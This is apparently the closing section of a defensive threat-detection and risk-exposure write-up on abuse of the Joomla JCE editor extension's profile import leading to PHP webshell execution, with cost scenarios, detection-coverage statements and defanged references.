Estimated exposure should be scenario-based and tied to whether activity remains limited to vulnerable exposure or suspicious profile-import attempts, becomes PHP webshell execution, or expands into credential access, database access, hosted-content tampering, phishing or malware hosting, abuse-report handling, legal review, customer communications, or multi-site compromise.

Low Impact Scenario

Estimated $15K - $75K.

This scenario applies when vulnerable-version exposure or suspicious JCE profile-import activity is identified quickly, exploit attempts are blocked or unsuccessful, and web-log review, profile inspection, file-system scanning, and update validation confirm no rogue profile, unexpected PHP artifact, webshell execution, credential access, content tampering, outbound callback, or customer impact.

Moderate Impact Scenario

Estimated $75K - $400K.

This scenario applies when a rogue JCE profile, suspicious PHP file, suspicious upload-policy change, suspicious PHP access, or incomplete telemetry prevents the organization from quickly ruling out webshell activity, credential exposure, hosted-content tampering, database access, or abuse infrastructure.

High Impact Scenario

Estimated $400K - $2.5M+.

This scenario applies when attackers executed PHP payloads, modified customer-facing content, accessed Joomla configuration files, accessed credentials, touched databases, hosted phishing or malware, created spam infrastructure, compromised multiple Joomla sites, triggered public abuse reports, affected ecommerce or customer portals, required legal review, or forced emergency rebuild and restoration of web trust.

Annualized Risk Exposure

Estimated $75K - $500K for organizations with several externally facing Joomla sites, incomplete JCE inventory, limited CMS logging, short web-log retention, weak file telemetry, missing endpoint visibility, or incomplete hosting-control records.

Exposure may exceed $500K - $2.5M+ where Joomla compromise results in credential theft, database access, hosted-content manipulation, phishing or malware hosting, ecommerce exposure, regulated content exposure, customer-facing service interruption, legal review, customer communications, or public restoration of trust.

Operational Dependency

Operational dependency is high where Joomla supports customer acquisition, customer service, ecommerce, documentation, partner communication, authentication-adjacent workflows, marketing operations, regulated content collection, or public trust.

Control Trust

Control trust is reduced when the organization cannot prove that JCE profiles, upload settings, webroot files, writable directories, Joomla administrators, credentials, database access, FTP activity, hosting-control activity, and hosted content remained legitimate during the exposure window.

Visibility Confidence

Visibility confidence is highest when web logs, WAF logs, reverse-proxy logs, CMS profile state, file telemetry, endpoint telemetry, DNS/proxy logs, FTP logs, hosting-control logs, database logs, backup records, approved inventories, and maintenance records can be joined reliably.

Change-Control Confidence

Change-control confidence is high when JCE updates, profile changes, CMS administration, plugin updates, template changes, file modifications, backup restores, credential rotations, WAF changes, and emergency remediation are documented and attributable.

Downstream Dependency

Downstream dependency is high when Joomla connects to databases, mail servers, payment pages, customer forms, file uploads, customer portals, marketing automation, analytics scripts, hosting-control systems, backup systems, FTP workflows, CDN services, or adjacent business applications.

Customer and Regulatory Exposure

Customer and regulatory exposure increases when suspicious Joomla activity may affect customer-facing content, regulated content, contact-form data, ecommerce records, uploaded documents, credentials, payment-page integrity, authentication-adjacent workflows, phishing or malware hosting, or public communications.

Residual Economic Risk

Residual economic risk remains if the organization cannot prove that vulnerable JCE versions were updated, rogue profiles were removed, unexpected PHP files were identified, webshell execution was ruled out, credentials were rotated where required, hosted content was reviewed, databases were checked where warranted, outbound behavior was scoped, and website integrity was restored.

Behavioral Coverage Assessment

This TTD covers Joomla JCE profile-import abuse aligned with unauthenticated CMS profile-state manipulation, executable upload enablement, PHP payload placement, web-accessible execution, webshell behavior, credential-file access, rare egress, hosted-content tampering, and post-patch compromise validation.

The TTD is not limited to one CVE string, exploit payload, request path, user agent, IP address, webshell name, WAF signature, scanner result, vendor advisory, or proof-of-concept implementation.

Detection Engineering Coverage Interpretation

The S25 detection content provides direct behavioral coverage where observable activity falls inside the TTD’s detection model: suspicious JCE profile import, rogue profile or upload-policy state, PHP-like file placement in writable paths, HTTP access to PHP-like files, web server service-context execution, sensitive Joomla file access, rare egress, FTP or hosting-control activity, and hosted-content changes.

The S25 detection content provides coverage with adaptation for related Joomla, CMS extension, PHP webshell, shared-hosting, webroot tampering, credential-file access, or hosted-content abuse activity where observable behavior aligns to CMS configuration abuse, executable upload enablement, webshell execution, credential exposure, file tampering, or abuse infrastructure.

Non-Coverage Conditions

Non-coverage applies where related activity does not produce observable JCE profile-import behavior, rogue CMS profile state, executable upload enablement, PHP-like file placement, web-accessible execution, web server service-context execution, sensitive file access, rare egress, FTP activity, hosting-control activity, hosted-content tampering, or website integrity impact.

Activity limited to unrelated Joomla vulnerabilities, unrelated CMS platforms, generic PHP webshell activity without JCE linkage, cloud-only anomalies, identity-only anomalies, network-only anomalies, isolated scanner findings, benign administrative maintenance, or unrelated hosting-control issues should not be represented as covered by this TTD unless behavior aligns to the detection model.

Coverage Qualification

This is a behavioral detection-readiness statement, not a universal Joomla, CMS, PHP, webshell, cloud-hosting, CVE, KEV, or proof-of-concept coverage ledger. A related issue should only be considered aligned when it shares enough observable behavior with the TTD’s detection model to support credible detection or detection-readiness coverage.

KEV status, vendor severity, exploit availability, or public proof-of-concept status should be treated as urgency and remediation-prioritization signals, not as the basis for coverage by themselves. Coverage remains based on observable Joomla/JCE-to-PHP-execution behavior aligned to the TTD’s S21 through S25 detection strategy.

Executive Exposure Statement

The organization’s economic exposure is highest when Joomla JCE compromise creates uncertainty around whether website content, CMS profile state, upload controls, webroot files, credentials, databases, hosting-control activity, outbound behavior, and customer-facing content remain trustworthy. The strategic risk is not one CVE or one request path; it is the possibility that attackers can convert a trusted CMS editor extension into PHP execution and leave backdoors or content changes behind after patching.

S40 References

Vendor / Platform Documentation

·        JCE / Widget Factory - JCE Security Update and Free Patch for Older Sites - hxxps://www[.]joomlacontenteditor[.]net/news/jce-security-update-and-a-free-patch-for-older-sites

·        Joomla Content Editor - hxxps://www[.]joomlacontenteditor[.]net/

·        Joomla Documentation - Security Checklist - hxxps://docs[.]joomla[.]org/Security_Checklist

Vulnerability and Technical Analysis

·        NVD - CVE-2026-48907 - hxxps://nvd[.]nist[.]gov/vuln/detail/CVE-2026-48907

·        YesWeHack - RCE in Joomla Content Editor Extension - hxxps://www[.]yeswehack[.]com/news/rce-joomla-content-editor-extension

Threat Technique Framework

·        MITRE ATT&CK Enterprise Matrix / Techniques Catalog - hxxps://attack[.]mitre[.]org/

Detection Platform Documentation

·        SentinelOne Documentation - hxxps://docs[.]sentinelone[.]com/

·        Splunk Search Reference - hxxps://docs[.]splunk[.]com/Documentation/Splunk/latest/SearchReference/WhatsInThisManual

·        Elastic Security Detection Rules Documentation - hxxps://www[.]elastic[.]co/guide/en/security/current/rules-ui-management.html

·        IBM QRadar Documentation - hxxps://www[.]ibm[.]com/docs/en/qradar-common

·        Sigma Rule Specification - hxxps://sigmahq[.]io/docs/basics/rules.html

·        YARA Documentation - hxxps://yara[.]readthedocs[.]io/

·        AWS WAF Documentation - hxxps://docs[.]aws[.]amazon[.]com/waf/

·        Azure Monitor Logs Documentation - hxxps://learn[.]microsoft[.]com/azure/azure-monitor/logs/

·        Google Cloud Logging Documentation - hxxps://cloud[.]google[.]com/logging/docs